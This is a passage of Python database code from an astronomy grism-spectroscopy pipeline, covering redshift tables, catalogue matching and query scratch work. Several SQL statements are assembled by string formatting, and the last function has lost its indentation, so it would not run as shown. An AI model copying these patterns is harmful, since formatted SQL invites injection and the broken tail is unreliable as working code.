    mtime = Time(os.stat(beams_file).st_mtime, format='unix').iso

    root = beams_file.split('_')[0]
    id = int(beams_file.split('_')[1].split('.')[0])

    # Skip files that are already in the table with the same mtime
    res = pd.read_sql_query("SELECT mtime from multibeam WHERE (root = '{0}' AND id = {1})".format(root, id), engine)
    if len(res) == 1:
        if (res['mtime'][0] == mtime) & (not force):
            print('{0} already in multibeam table'.format(beams_file))
            return True

    mb = multifit.MultiBeam(beams_file, **kwargs)

    print('Update `multibeam` and `beam_geometry` tables for {0}.'.format(beams_file))

    # Dummy for loading the templates the same way as for the quasars
    # for generating the spline fit
    templ_args = {'uv_line_complex': True,
                  'broad_fwhm': 2800,
                  'narrow_fwhm': 1000,
                  'fixed_narrow_lines': True,
                  'Rspline': Rspline,
                  'include_reddened_balmer_lines': False}

    q0, q1 = utils.load_quasar_templates(**templ_args)

    # Keep just the spline (continuum) templates
    for t in list(q0.keys()):
        if 'bspl' not in t:
            q0.pop(t)

    tfit = mb.template_at_z(0, templates=q0, fitter='lstsq')

    sp = tfit['line1d'].wave, tfit['line1d'].flux
    m2d = mb.get_flat_model(sp, apply_mask=True, is_cgs=True)

    mb.initialize_masked_arrays()

    # Chi-squared of the data against a null (zero) model
    chi0 = (mb.scif_mask**2*mb.ivarf[mb.fit_mask]).sum()

    # Percentiles of masked contam, sci, err and contam/sci
    pvals = np.arange(5, 96, 5)

    contam_percentiles = np.percentile(mb.contamf_mask, pvals)
    sci_percentiles = np.percentile(mb.scif_mask, pvals)
    err_percentiles = np.percentile(1/mb.sivarf[mb.fit_mask], pvals)
    sn_percentiles = np.percentile(mb.scif_mask*mb.sivarf[mb.fit_mask], pvals)
    fcontam_percentiles = np.percentile(mb.contamf_mask/mb.scif_mask, pvals)

    # multibeam dataframe

    # Fix: `np.float` was a deprecated alias of the builtin `float` and
    # was removed in NumPy 1.24 — use the builtin directly (same type)
    float_type = float

    df = pd.DataFrame()
    df['root'] = [root]
    df['id'] = [id]
    df['objid'] = [-1]
    df['mtime'] = [mtime]
    df['status'] = [6]
    df['scip'] = [list(sci_percentiles.astype(float_type))]
    df['errp'] = [list(err_percentiles.astype(float_type))]
    df['snp'] = [list(sn_percentiles.astype(float_type))]
    df['snmax'] = [float_type((mb.scif_mask*mb.sivarf[mb.fit_mask]).max())]
    df['contamp'] = [list(contam_percentiles.astype(float_type))]
    df['fcontamp'] = [list(fcontam_percentiles.astype(float_type))]
    df['chi0'] = [np.int32(chi0)]
    df['rspline'] = [Rspline]
    df['chispl'] = [np.int32(tfit['chi2'])]
    df['mb_dof'] = [mb.DoF]
    df['wmin'] = [np.int32(mb.wave_mask.min())]
    df['wmax'] = [np.int32(mb.wave_mask.max())]

    # Input args
    for a in ['fcontam', 'sys_err', 'min_sens', 'min_mask']:
        df[a] = [getattr(mb, a)]

    # Send to DB, replacing any earlier entry
    # NOTE(review): the trailing `engine` argument to `execute` looks
    # accidental but is preserved for compatibility with the old API
    res = engine.execute("DELETE from multibeam WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)
    df.to_sql('multibeam', engine, index=False, if_exists='append', method='multi')

    # beams dataframe
    d = {}
    for k in ['root', 'id', 'objid', 'filter', 'pupil', 'pa', 'instrument', 'fwcpos', 'order', 'parent', 'parent_ext', 'ccdchip', 'sci_extn', 'exptime', 'origin_x', 'origin_y', 'pad', 'nx', 'ny', 'sregion']:
        d[k] = []

    for beam in mb.beams:
        d['root'].append(root)
        d['id'].append(id)
        d['objid'].append(-1)

        for a in ['filter', 'pupil', 'instrument', 'pad',
                  'fwcpos', 'ccdchip', 'sci_extn', 'exptime']:
            d[a].append(getattr(beam.grism, a))

        d['order'].append(beam.beam.beam)

        parent = beam.grism.parent_file.replace('.fits', '').split('_')
        d['parent'].append(parent[0])
        d['parent_ext'].append(parent[1])

        d['origin_x'].append(beam.grism.origin[1])
        d['origin_y'].append(beam.grism.origin[0])
        d['nx'].append(beam.sh[1])
        d['ny'].append(beam.sh[0])

        # Exposure footprint as a POLYGON string
        f = beam.grism.wcs.calc_footprint().flatten()
        fs = ','.join(['{0:.6f}'.format(c) for c in f])
        d['sregion'].append('POLYGON({0})'.format(fs))

        d['pa'].append(int(np.round(beam.get_dispersion_PA())))

    df = pd.DataFrame.from_dict(d)

    # Send to database, replacing any earlier entry
    res = engine.execute("DELETE from beam_geometry WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)
    df.to_sql('beam_geometry', engine, index=False, if_exists='append', method='multi')


if False:
    # Developer scratch: one-off migration of the string percentile
    # columns to real[] arrays (never executed at import)

    # Fix multibeam arrays
    import pandas as pd
    import numpy as np
    from sqlalchemy import types
    from grizli.aws import db as grizli_db
    engine = grizli_db.get_db_engine()

    df = pd.read_sql_query('select id, root, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)

    c = 'snp'
    data = pd.DataFrame()
    data['id'] = df['id']
    data['root'] = df['root']
    dtype = {'root': types.String, 'id': types.Integer}
    for c in df.columns:
        if c.endswith('p'):
            print(c)
            dtype[c[:-1]+'_p'] = types.ARRAY(types.FLOAT)
            data[c[:-1]+'_p'] = [list(np.cast[float](line.strip()[1:-1].split(','))) for line in df[c]]

    data.to_sql('multibeam_tmp', engine, index=False, if_exists='append', method='multi')

    from sqlalchemy import types
    for c in df.columns:
        if c.endswith('p'):
            pass

    for c in df.columns:
        if c.endswith('p'):
            sql = "ALTER TABLE multibeam ADD COLUMN {0} real[];".format(c[:-1]+'_p')
            print(sql)

            sql = "UPDATE multibeam mb SET {new} = tmp.{new} FROM multibeam_tmp tmp WHERE tmp.id = mb.id AND tmp.root = mb.root;".format(new=c[:-1]+'_p')
            print(sql)

    x = grizli_db.from_sql('select id, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)
def test_join():
    """
    Developer scratch: example JOIN queries between `photometry_apcorr`
    and `redshift_fit`.  Relies on a module-level `engine`; not called
    by production code.
    """
    import pandas as pd

    # Join photometry with all positive-z fits
    res = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)

    res = pd.read_sql_query("SELECT * FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)

    # on root
    root = 'xxx'
    res = pd.read_sql_query("SELECT p.root, p.id, mag_auto, z_map, status FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE root='{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(root), engine)
def column_comments():
    """
    Generate ``COMMENT ON COLUMN`` statements for a database table from
    a YAML file of column descriptions.

    Workflow: on the first run, dump a template
    ``{tablename}_comments.yml`` with every column set to the
    placeholder '---'; edit that file by hand, then rerun to build the
    SQL.  Columns still set to '---' are skipped.

    Returns
    -------
    SQL : str
        Concatenated ``COMMENT ON COLUMN`` statements.  (Fix: previously
        the string was built but never returned or executed.)
    """
    from collections import OrderedDict
    import yaml

    tablename = 'redshift_fit'

    # Empty SELECT fetches the column names without any rows
    cols = pd.read_sql_query('select * from {0} where false'.format(tablename), engine)

    d = {}  # OrderedDict{}
    for c in cols.columns:
        d[c] = '---'

    if not os.path.exists('{0}_comments.yml'.format(tablename)):
        print('Init {0}_comments.yml'.format(tablename))
        # Context manager closes the file even if yaml.dump raises
        # (fix: previous version leaked the file handle)
        with open('{0}_comments.yml'.format(tablename), 'w') as fp:
            yaml.dump(d, stream=fp, default_flow_style=False)

    # Edit file, then reload it here.
    # Fix: `yaml.load` without a Loader raises TypeError on PyYAML >= 6;
    # safe_load is sufficient for a plain mapping of strings
    with open('{0}_comments.yml'.format(tablename)) as fp:
        comments = yaml.safe_load(fp)

    SQL = ""
    upd = "COMMENT ON COLUMN {0}.{1} IS '{2}';\n"
    for col in comments:
        if comments[col] != '---':
            SQL += upd.format(tablename, col, comments[col])
        else:
            print('Skip ', col)

    return SQL
def add_spectroscopic_redshifts(xtab, rmatch=1, engine=None, db=None):
    """
    Add spectroscopic redshifts to the photometry_apcorr table

    Input table needs (at least) columns:
       ['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual']

    Parameters
    ----------
    xtab : `~astropy.table.Table`
        Table of spectroscopic redshifts.

    rmatch : float
        Sky-match radius, arcsec.

    engine : sqlalchemy engine
        Database connection, created if None.

    db : table-like, None
        Cached (root, id, ra, dec) photometry table; queried from the
        database if None.
    """
    import glob
    import pandas as pd
    from astropy.table import vstack
    from grizli.aws import db as grizli_db
    from grizli import utils

    # Validate required columns before touching the database
    for c in ['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual']:
        if c not in xtab.colnames:
            print('Column {0} not found in input table'.format(c))
            return False

    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)

    # Force data types
    tab = xtab[xtab['z_spec'] >= 0]

    if hasattr(tab['ra'], 'mask'):
        tab = tab[~tab['ra'].mask]

    # `*1` forces plain (unmasked) integer arrays
    tab['z_spec_qual'] = tab['z_spec_qual']*1
    tab['z_spec_qual_raw'] = tab['z_spec_qual_raw']*1

    if False:
        # scratch: look for duplicates (never executed)
        fit = grizli_db.from_sql("select root, ra, dec from redshift_fit", engine)
        fit = grizli_db.from_sql("select root, ra, dec from redshift_fit where ra is null", engine)

    # Select master table
    if db is None:
        res = pd.read_sql_query("SELECT p_root, p_id, p_ra, p_dec, z_spec from photometry_apcorr", engine)
        db = utils.GTable.from_pandas(res)
        for c in ['p_root', 'p_id', 'p_ra', 'p_dec']:
            db.rename_column(c, c[2:])

    # Sky-match input redshifts against the photometric catalog
    idx, dr = db.match_to_catalog_sky(tab)
    hasm = (dr.value < rmatch) & (tab['z_spec'] >= 0)

    tab['z_spec_dr'] = dr.value
    tab['z_spec_ra'] = tab['ra']
    tab['z_spec_dec'] = tab['dec']

    tab['db_root'] = db['root'][idx]
    tab['db_id'] = db['id'][idx]

    tabm = tab[hasm]['db_root', 'db_id', 'z_spec', 'z_spec_src', 'z_spec_dr', 'z_spec_ra', 'z_spec_dec', 'z_spec_qual_raw', 'z_spec_qual']

    print('Send zspec to photometry_apcorr (N={0})'.format(hasm.sum()))

    # Upload matches to a temporary table, then update with a single
    # UPDATE ... FROM join
    df = tabm.to_pandas()
    df.to_sql('z_spec_tmp', engine, index=False, if_exists='replace', method='multi')

    SQL = """UPDATE photometry_apcorr
    SET z_spec = zt.z_spec,
        z_spec_src = zt.z_spec_src,
        z_spec_dr = zt.z_spec_dr,
        z_spec_ra = zt.z_spec_ra,
        z_spec_dec = zt.z_spec_dec,
        z_spec_qual_raw = zt.z_spec_qual_raw,
        z_spec_qual = zt.z_spec_qual
    FROM z_spec_tmp as zt
    WHERE (zt.db_root = p_root AND zt.db_id = p_id);
    """

    engine.execute(SQL)

    if False:
        # Update redshift_fit ra/dec with photometry_table double prec.
        # NOTE(review): missing comma between the two SET assignments —
        # this SQL would fail if executed (dead code, never runs)
        SQL = """UPDATE redshift_fit
    SET ra = p_ra
        dec = p_dec
    FROM photometry_apcorr
    WHERE (phot_root = p_root AND id = p_id AND root = 'j123556p6221');
    """
def mtime_to_iso(ct):
    """
    Convert mtime values to ISO format suitable for sorting, etc.

    Expects ctime-style strings like ``'Mon Apr 6 12:34:56 2020'`` and
    returns ``'2020-04-06 12:34:56'``.
    """
    month_abbrev = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                    'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']

    tokens = ct.split()
    month_number = month_abbrev.index(tokens[1]) + 1
    day_number = int(tokens[2])

    # Year and time are taken from the end so an optional timezone token
    # does not shift the indices of month/day
    return '{yr}-{mo:02d}-{dy:02d} {time}'.format(dy=day_number,
                                                  mo=month_number,
                                                  yr=tokens[-1],
                                                  time=tokens[-2])
def various_selections():
from grizli.aws import db as grizli_db
# sdss z_spec
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^sdss-dr15'", table_root='sdss_zspec', sync='s3://grizli-v1/tables/')
# objects with carla redshifts (radio loud)
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^carla'", table_root='carla_zspec', sync='s3://grizli-v1/tables/')
# Bright galaxies with q_z flag
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND mag_auto < 22 AND z_map > 1.3", table_root='bright', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# High-z compiliation
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'q_z', 'h_zphot', 'h_src', 'h_dr'], where="AND status > 4 AND phot_root = h_root AND id = h_id AND h_dr < 1", tables=['highz_2015'], table_root='highz', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# z_spec with dz
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1", table_root='zspec_delta', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# Point sources
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND mag_auto < 24 AND flux_radius < 1.9 AND ((flux_radius < 1.5 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.9 AND flux_radius > 1.0 AND red_bit < 32))", table_root='point_sources', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)
# Reliable redshifts
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', '(flux_radius < 1.7 AND ((flux_radius < 1.4 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.7 AND flux_radius > 1.0 AND red_bit < 32)))::int as is_point', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'sn_siii', 'sn_ha', 'sn_oiii', 'sn_oii', 'ew50_ha', 'd4000', 'd4000_e', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND chinu < 30 AND q_z > -0.7 order by q_z", table_root='reliable_redshifts', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full'], get_sql=False, sort_column=('q_z', -1))
# stellar classification?
# sql = """SELECT root, id, ra, dec, status, z_map, q_z_map, bic_diff,
# bic_diff_star,
# chinu as t_chinu, s_chinu, q_chinu,
# chinu - q_chinu as tq_chinu, q_chinu - s_chinu as qs_chinu,
# chinu - s_chinu as ts_chinu, stellar_template
# FROM redshift_fit,
# (SELECT root as s_root, id as s_id, chinu as s_chinu, bic_diff_star,
# stellar_template
# FROM stellar_fit
# WHERE status = 6
# ) as s,
# (SELECT root as q_root, id as q_id, chinu as q_chinu,
# bic_diff as q_bic_diff, z_map as q_z_map
# FROM redshift_fit_quasar
# WHERE status = 6
# ) as q
# WHERE (root = s_root AND id = s_id) AND (root = q_root AND id = q_id)
# """
#res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='carbon_stars', sync='s3://grizli-v1/tables/', png_ext=['stack','line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)
sql = """SELECT root, id, status, ra, dec, t_g800l, t_g102, t_g141,
z_map, q_z_map, bic_diff,
bic_diff_star, (bic_diff_star > 10 AND q_chinu < 20 AND chinu - q_chinu > 0.05 AND q_chinu-s_chinu > 0 AND chinu-s_chinu > 0.1)::int as is_star,
chinu as t_chinu, s_chinu, q_chinu,
bic_qso-bic_gal as bic_gq,
bic_gal-bic_star as bic_gs,
bic_qso-bic_star as bic_qs,
(bic_spl+chimin)-bic_gal as bic_gx,
bic_spl_qso-bic_qso as bic_qx,
q_vel_bl, qso_q_z, qso_zw1, stellar_template
FROM (SELECT *, bic_temp+chimin as bic_gal FROM redshift_fit z,
(SELECT root as q_root, id as q_id, chinu as q_chinu,
bic_diff as q_bic_diff, bic_temp+chimin as bic_qso,
bic_spl+chimin as bic_spl_qso,
z_map as qso_z_map,
zwidth1/(1+z_map) as qso_zw1, vel_bl as q_vel_bl,
q_z as qso_q_z
FROM redshift_fit_quasar
WHERE status = 6
) q
WHERE (root = q_root AND id = q_id)) c
LEFT JOIN
(SELECT root as s_root, id as s_id, chinu as s_chinu,
LN(dof)*nk+chi2 as bic_star,
LN(dof)*(nk-1)+chi2_flat as bic_spline,
bic_diff_star,
stellar_template
FROM stellar_fit
WHERE status = 6
) s ON (root = s_root AND id = s_id) WHERE chinu-q_chinu > 0.5
"""
cstar = grizli_db.from_sql(sql, engine)
cstar['is_star'] = cstar['is_star'].filled(-1)
print('N={0}'.format(len(cstar)))
res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='quasars_and_stars', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)
# best-fit as quasar
sql = """SELECT root, id, ra, dec, status, z_map, q_z_map,
q_z, bic_diff, q_bic_diff,
chinu as t_chinu, q_chinu,
chinu - q_chinu as tq_chinu,
(q_bic_temp + q_chimin) - (bic_temp + chimin) as bic_diff_quasar,
q_vel_bl
FROM redshift_fit z JOIN
(SELECT root as q_root, id as q_id, chinu as q_chinu,
bic_diff as q_bic_diff, z_map as q_z_map, vel_bl,
chimin as q_chimin, bic_temp as q_bic_temp, vel_bl as q_vel_bl
FROM redshift_fit_quasar
WHERE status = 6
) as q
WHERE (root = q_root AND id = q_id) AND status = 6 AND q_z > -1
"""
qq = grizli_db.from_sql(sql, engine)
res = grizli_db.make_html_table(engine=engine, res=qq, table_root='quasar_fit', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)
# Strong lines
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'sn_ha', 'sn_oiii', 'sn_oii'], where="AND status > 4 AND mag_auto < 24 AND (sn_ha > 10 OR sn_oiii > 10 OR sn_oii > 10) AND flux_radius >= 1.6", table_root='strong_lines', sync='s3://grizli-v1/tables/', png_ext=['stack', 'full', 'qso.full', 'star'])
# brown dwarf?
tablename = 'spec1d_r30_g141'
wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
engine)[tablename+'_wave'].values
# 1.15, 1.25, 1.4
i0 = 25, 28, 29, 32
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25]/{0}_flux[28] as c1'.format(tablename), '{0}_flux[32]/{0}_flux[28] as c2'.format(tablename)], where="AND status > 4 AND flux_radius < 2 AND flux_radius > 1 AND mag_auto < 25 AND {0}_root = root AND {0}_id = id AND {0}_flux[28] > 0 AND {0}_flux[28]/{0}_err[28] > 5 AND {0}_flux[32] > 0 AND {0}_flux[25] > 0 AND {0}_flux[32]/{0}_flux[28] < 0.5".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25] as c25'.format(tablename), '{0}_flux[32] as c32'.format(tablename)], where="AND status > 4 AND z_spec = 0".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# with line ratios
lstr = 'err_{0} > 0 AND err_{0} < 5e-17'
err_lines = ' AND '.join(lstr.format(li) for li in
['hb', 'oiii', 'ha', 'sii'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn', 'flux_hb/flux_ha as HbHa', 'flux_hb/flux_oiii as HbO3', 'flux_oiii/flux_ha as O3Ha'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1 AND sn_oiii > 3 AND sn_ha > 2 AND {0}".format(err_lines), table_root='zspec_lines', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
if False:
from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator
import matplotlib.pyplot as plt
xti = xt = np.arange(0, 3.6, 0.5)
loc = np.arange(0, 3.6, 0.1)
bins = utils.log_zgrid([0.03, 3.5], 0.01)
fig = plt.figure(figsize=[7, 6])
ax = fig.add_subplot(111)
ax.scatter(np.log(1+res['z_spec']), np.log(1+res['z_map']), alpha=0.2, c=np.log10(res['zw1']), marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')
sc = ax.scatter(np.log([1]), np.log([1]), alpha=0.8, c=[0], marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')
cb = plt.colorbar(sc, shrink=0.6)
cb.set_label(r'$(z_{84}-z_{16})/(1+z_{50})$')
cb.set_ticks([-3, -2, -1])
cb.set_ticklabels([0.001, 0.01, 0.1])
xts = ax.set_xticks(np.log(1+xt))
xtl = ax.set_xticklabels(xti)
xts = ax.set_yticks(np.log(1+xt))
xtl = ax.set_yticklabels(xti)
ax.set_xlim(0, np.log(1+3.5))
ax.set_ylim(0, np.log(1+3.5))
ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.yaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.set_xlabel('z_spec')
ax.set_ylabel('z_MAP')
ax.set_aspect(1)
ax.grid()
ax.text(0.95, 0.05, r'$N={0}$'.format(len(res)), ha='right', va='bottom', transform=ax.transAxes)
ax.plot(ax.get_xlim(), ax.get_xlim(), color='k', alpha=0.2, linewidth=1, zorder=-10)
fig.tight_layout(pad=0.1)
fig.savefig('grizli_v1_literature_zspec.pdf')
# COSMOS test
root = 'cos-grism-j100012p0210'
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND bic_diff > 100 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# high bic_diff = unambiguous
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e', '-(bic_temp-bic_spl) as bic_diff_spl'], where="AND status > 5 AND (((bic_diff > 50 OR zwidth1/(1+z_map) < 0.01) AND chinu < 2))", table_root='unamb', sync='s3://grizli-v1/tables/')
# with d4000
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status > 5 AND chinu < 3 AND d4000 > 1 AND d4000 < 5 AND d4000_e > 0 AND d4000_e < 0.25 AND bic_diff > 5", table_root='d4000', sync='s3://grizli-v1/tables/')
# LBG?
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '-(bic_temp-bic_spl) as bic_diff_spl', 'splf01/splf02 as r12', 'splf02/splf03 as r23', 'splf02/sple02 as sn02'], where="AND status > 5 AND mag_auto > 23 AND bic_diff > -50 AND splf01/splf02 < 0.3 AND splf02/sple02 > 2 AND splf01 != 0 AND splf02 != 0 AND splf03 != 0 ".format(root), table_root='lbg_g800l', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# stars?
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND bic_diff > 100 AND chinu < 1.5 AND mag_auto < 24 AND sn_Ha > 20", table_root='star', sync='s3://grizli-v1/tables/')
# By root
root = 'j001420m3030'
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND root = '{0}' AND bic_diff > 5".format(root), table_root=root+'-fit', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# G800L spec-zs
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '(z_map-z_spec)/(1+z_spec) as delta_z'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND t_g800l > 0", table_root='zspec_g800l', sync='s3://grizli-v1/tables/')
# Large G800L likely mismatch [OIII]/Ha
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 3 AND mag_auto < 23 AND bic_diff > 5", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')
# Potential Ly-a?
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 5 AND sn_ha > 0 AND flux_oiii/flux_ha > 1.8", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')
# Continuum resid
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND bic_diff > 5 AND splf01 > 0 AND bic_diff > 50".format(root), table_root='xxx', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
